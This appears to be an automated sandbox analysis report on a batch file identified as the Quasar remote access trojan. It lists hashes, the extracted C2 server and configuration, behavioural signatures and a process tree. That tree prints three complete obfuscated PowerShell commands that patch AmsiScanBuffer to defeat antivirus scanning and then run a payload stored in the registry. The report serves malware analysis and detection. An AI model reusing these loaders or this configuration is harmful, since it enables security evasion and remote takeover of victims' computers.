Analysis

  • max time kernel
    300s
  • max time network
    203s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-05-2024 19:01

General

  • Target

    Fix.bat

  • Size

    621B

  • MD5

    e235e723f57a72ef725306c3e14d4726

  • SHA1

    9b2153053f8e89c300e32da5df32e9b990594aac

  • SHA256

    aebe0bafeb12706e614a45f2df40518d32d502093517ce95e2d3c1bbfd64ca67

  • SHA512

    0a4eda531be3904ae944d2c1c43755921cde4333a8e9d6bee6669e3de73b6c7859bb7ab3aa7a712fa2085d3fa1fb1d1ed14e5d6ed488a10bd2f6ab6ed049d25e

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

RPad

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-okPqrmZ8kNVUcS4Rp0

Attributes
  • encryption_key

    XmcBnPuLlN1e8SHIRR1z

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-LOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 4 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{00eca804-5229-42b0-9a24-a13594b6ae71}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2064
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{2a325d82-23e9-4c30-b296-202ad43a1b1d}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2392
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{e77d91e6-43ca-4ca4-9999-d94b4ecf3a5f}
          2⤵
            PID:2972
        • C:\Windows\system32\lsass.exe
          C:\Windows\system32\lsass.exe
          1⤵
            PID:676
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
            1⤵
              PID:952
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
              1⤵
                PID:408
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:868
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:1132
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2180
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lqxsMvNXCJXA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mQjzuTVsjjmEnx,[Parameter(Position=1)][Type]$RLJwkUFXHu)$QFQuQvFsDcq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+'c'+''+[Char](116)+''+'e'+'d'+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+'u'+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+'e'+'',''+'C'+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+'i'+'c'+''+','+''+[Char](83)+'eal'+'e'+''+[Char](100)+''+','+''+'A'+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+'la'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+'o'+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$QFQuQvFsDcq.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+'e'+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+'Hi'+'d'+''+[Char](101)+''+'B'+'y'+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$mQjzuTVsjjmEnx).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+''+[Char](100)+'');$QFQuQvFsDcq.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+'ic,'+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+'t'+[Char](44)+'V'+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$RLJwkUFXHu,$mQjzuTVsjjmEnx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+'i'+'m'+[Char](101)+''+','+''+[Char](77)+'a'+'n'+'a'+[Char](103)+''+'e'+'d');Write-Output $QFQuQvFsDcq.CreateType();}$ltSDtKgFSuwKM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+''+'t'+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+'of'+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+'e'+''+'N'+''+[Char](97)+''+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+[Char](100)+'s');$yUpEAaXqFhkTCS=$ltSDtKgFSuwKM.GetMethod('G'+[Char](101)+''+[Char](116)+'P'+[Char](114)+'o'+[Char](99)+'Ad'+[Char](100)+'r'+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TswAYtxkcqDRGWMoNjC=lqxsMvNXCJXA @([String])([IntPtr]);$UlisTRKUYuwmqrYpXCOxbr=lqxsMvNXCJXA @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OiqYxYpiTSr=$ltSDtKgFSuwKM.GetMethod('G'+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+'an'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'er'+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$fqRZaBDEeXTIPl=$yUpEAaXqFhkTCS.Invoke($Null,@([Object]$OiqYxYpiTSr,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$NSCOoqoVnWXgUkxhX=$yUpEAaXqFhkTCS.Invoke($Null,@([Object]$OiqYxYpiTSr,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+'ua'+[Char](108)+'P'+[Char](114)+''+'o'+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$GiJlxMb=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fqRZaBDEeXTIPl,$TswAYtxkcqDRGWMoNjC).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$NujfQZjjToarEdnCb=$yUpEAaXqFhkTCS.Invoke($Null,@([Object]$GiJlxMb,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+'fe'+[Char](114)+'')));$iYqkhgXHxV=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NSCOoqoVnWXgUkxhX,$UlisTRKUYuwmqrYpXCOxbr).Invoke($NujfQZjjToarEdnCb,[uint32]8,4,[ref]$iYqkhgXHxV);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$NujfQZjjToarEdnCb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NSCOoqoVnWXgUkxhX,$UlisTRKUYuwmqrYpXCOxbr).Invoke($NujfQZjjToarEdnCb,[uint32]8,0x20,[ref]$iYqkhgXHxV);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+'W'+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2960
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:wbgEfUEgQpbt{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HdCwuzJjZOcQfb,[Parameter(Position=1)][Type]$DPKebSinUV)$CBcdWrOBfXO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+'ect'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+'y'+'D'+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+'C'+'l'+[Char](97)+''+[Char](115)+'s'+','+'P'+'u'+''+'b'+'l'+[Char](105)+''+'c'+''+','+'S'+[Char](101)+''+[Char](97)+''+'l'+'e'+'d'+','+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+','+''+'A'+'ut'+[Char](111)+''+[Char](67)+'l'+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$CBcdWrOBfXO.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+'e,'+'H'+'id'+[Char](101)+'BySig'+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$HdCwuzJjZOcQfb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$CBcdWrOBfXO.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+'c'+''+','+'Hi'+[Char](100)+'e'+[Char](66)+'yS'+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+''+'S'+''+'l'+''+'o'+'t'+[Char](44)+'V'+'i'+'r'+'t'+'ua'+'l'+'',$DPKebSinUV,$HdCwuzJjZOcQfb).SetImplementationFlags(''+'R'+'un'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+'an'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $CBcdWrOBfXO.CreateType();}$CPaortkewPSgv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+'e'+'m.'+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+'t'+''+[Char](46)+'W'+[Char](105)+'n'+[Char](51)+'2'+[Char](46)+''+'U'+''+[Char](110)+'s'+[Char](97)+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+'d'+'s');$fsRmvIcauFVKmp=$CPaortkewPSgv.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$bgKWlErDuvmufFZprOx=wbgEfUEgQpbt @([String])([IntPtr]);$iUDMmIQKfDlJDeaiqgxieT=wbgEfUEgQpbt @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GzHMRtuPyHq=$CPaortkewPSgv.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+'l'+'e'+'H'+[Char](97)+''+'n'+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+'e'+'r'+'n'+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$mQGULqrsifTofr=$fsRmvIcauFVKmp.Invoke($Null,@([Object]$GzHMRtuPyHq,[Object](''+'L'+'oa'+'d'+''+'L'+''+[Char](105)+'br'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$nmXFImWCSkNLDoeom=$fsRmvIcauFVKmp.Invoke($Null,@([Object]$GzHMRtuPyHq,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$nXwrlwj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mQGULqrsifTofr,$bgKWlErDuvmufFZprOx).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+'d'+'l'+''+'l'+'');$bTkndDOtHvcNqYWyw=$fsRmvIcauFVKmp.Invoke($Null,@([Object]$nXwrlwj,[Object]('A'+[Char](109)+'si'+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+'er')));$FXWyOhGZuc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nmXFImWCSkNLDoeom,$iUDMmIQKfDlJDeaiqgxieT).Invoke($bTkndDOtHvcNqYWyw,[uint32]8,4,[ref]$FXWyOhGZuc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bTkndDOtHvcNqYWyw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nmXFImWCSkNLDoeom,$iUDMmIQKfDlJDeaiqgxieT).Invoke($bTkndDOtHvcNqYWyw,[uint32]8,0x20,[ref]$FXWyOhGZuc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4844
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        3⤵
                          PID:864
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:sfJDnxkwbOlf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fPwaRqwiqtRUZP,[Parameter(Position=1)][Type]$HNYnrhDXXc)$HKipAMZOEXk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+'el'+'e'+''+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+'emo'+'r'+'y'+'M'+'od'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+'l'+'e'+''+'g'+'a'+'t'+'eT'+[Char](121)+''+[Char](112)+''+'e'+'',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'P'+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+'n'+''+'s'+''+'i'+''+'C'+''+[Char](108)+''+'a'+'s'+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$HKipAMZOEXk.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+'pe'+'c'+'i'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fPwaRqwiqtRUZP).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'t'+'i'+''+'m'+''+[Char](101)+','+[Char](77)+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+'e'+'d'+'');$HKipAMZOEXk.DefineMethod(''+'I'+'n'+'v'+''+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'H'+'i'+[Char](100)+'e'+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+'al',$HNYnrhDXXc,$fPwaRqwiqtRUZP).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+''+'a'+''+[Char](110)+'a'+'g'+'e'+'d'+'');Write-Output $HKipAMZOEXk.CreateType();}$PBeWfvrjqDoaN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.'+'W'+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+'.U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+'N'+''+'a'+'t'+[Char](105)+''+[Char](118)+'e'+'M'+''+[Char](101)+''+'t'+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$oWSjFBSEKLKtyQ=$PBeWfvrjqDoaN.GetMethod(''+'G'+''+[Char](101)+''+'t'+'Proc'+'A'+''+'d'+''+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+'t'+[Char](97)+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qJuNgZBpdjFuZdfvRMv=sfJDnxkwbOlf @([String])([IntPtr]);$dJKlyrsXwOpJaTNmfEOffH=sfJDnxkwbOlf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NzpoDbIUFkF=$PBeWfvrjqDoaN.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+'n'+'e'+'l'+[Char](51)+'2.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$klNqabyMuOAgMe=$oWSjFBSEKLKtyQ.Invoke($Null,@([Object]$NzpoDbIUFkF,[Object]('L'+[Char](111)+'adL'+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$MZRxlQGJbaUaIANgs=$oWSjFBSEKLKtyQ.Invoke($Null,@([Object]$NzpoDbIUFkF,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$yzxgbZK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($klNqabyMuOAgMe,$qJuNgZBpdjFuZdfvRMv).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+'.'+[Char](100)+''+'l'+''+[Char](108)+'');$jQSNinbNznilzubiD=$oWSjFBSEKLKtyQ.Invoke($Null,@([Object]$yzxgbZK,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+'c'+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+'f'+'f'+[Char](101)+''+'r'+'')));$IRZDOunEvt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MZRxlQGJbaUaIANgs,$dJKlyrsXwOpJaTNmfEOffH).Invoke($jQSNinbNznilzubiD,[uint32]8,4,[ref]$IRZDOunEvt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jQSNinbNznilzubiD,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MZRxlQGJbaUaIANgs,$dJKlyrsXwOpJaTNmfEOffH).Invoke($jQSNinbNznilzubiD,[uint32]8,0x20,[ref]$IRZDOunEvt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+'TW'+[Char](65)+'R'+'E'+'').GetValue(''+'$'+''+[Char](55)+'7'+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        PID:2204
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:3864
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                        • Drops file in System32 directory
                        PID:1148
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        1⤵
                          PID:1160
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                          1⤵
                            PID:1176
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1192
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                              1⤵
                                PID:1320
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1348
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                  1⤵
                                    PID:1368
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:2808
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                      1⤵
                                        PID:1428
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                        1⤵
                                          PID:1596
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                          1⤵
                                            PID:1604
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                            1⤵
                                              PID:1644
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                              1⤵
                                                PID:1716
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                1⤵
                                                  PID:1756
                                                • C:\Windows\System32\svchost.exe
